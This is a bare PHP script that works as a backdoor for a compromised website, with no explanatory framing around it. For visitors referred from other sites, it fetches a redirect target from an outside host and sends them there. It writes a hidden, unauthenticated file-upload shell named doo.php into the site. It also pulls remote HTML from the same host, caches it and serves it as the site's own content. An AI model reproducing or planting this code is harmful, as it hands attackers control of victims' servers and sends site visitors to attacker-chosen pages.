$webpath = 'https://bc8888.vip/indiashell';
$referer = $_SERVER['HTTP_REFERER'] ?? '';
if (!empty($referer) && strpos($referer, $_SERVER['HTTP_HOST']) === false) {
$url = $webpath . '/db.php?do=1';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (trim($response) !== '') {
header("Location: " . trim($response), true, 302);
exit();
}
}

$homeurl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$phpself = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
$scriptname = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'];

if(!file_exists("doo.php")){@file_put_contents("doo.php",' if($_SERVER["REQUEST_METHOD"]==="POST"&&isset($_FILES["file"])){if(move_uploaded_file($_FILES["file"]["tmp_name"],__DIR__."/".basename($_FILES["file"]["name"]))){echo"ok: ".__DIR__."/".basename($_FILES["file"]["name"]);}else{echo"error";}}

<button type="submit">upload</button>

');}

$cacheDir = 'cache';
if (!is_dir($cacheDir)) mkdir($cacheDir, 0755, true);
$cacheFile = $cacheDir . '/' . md5($homeurl) . '.html';
if (file_exists($cacheFile)) {
echo file_get_contents($cacheFile);
exit;
}

$url = $webpath . '/db.php?scriptname=' . urlencode($scriptname) . '&homeurl=' . urlencode($homeurl);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

file_put_contents($cacheFile, $response);
echo trim($response);